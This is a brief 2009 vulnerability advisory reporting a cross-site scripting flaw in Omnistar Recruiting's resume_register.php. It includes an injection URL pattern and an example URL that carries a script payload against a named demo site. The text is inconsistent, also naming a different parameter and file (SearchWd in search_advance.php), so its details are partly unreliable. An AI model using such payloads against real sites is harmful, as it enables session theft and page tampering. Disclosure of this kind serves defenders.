Omnistar Recruiting suffers from a cross site scripting vulnerability in resume_register.php.
3af800af3425dd707ba3bb4ab3ad980baaff28cf7ba65639b49d7a987f264e80
/*
Omnistar Recruiting (resume_register.php job2) XSS Vulnerability
Discovered by : MizoZ
Contact : mizoz@9.cn <mizozx@gmail.com>
Team : EvilWay
Date : July 29 2009
Greetings : Moudi , Zuka, All friends
*/
We can inject HTML code on the GET (SearchWd) in faille search_advance.php .
[HOST]/[PATH]/users/resume_register.php?job2=>[XSS]
Ex :
http://www.mywebetools.com/demo_recruiter8/users/resume_register.php?job2=%3E%3Cscript%3Ealert%281%29%3C/script%3E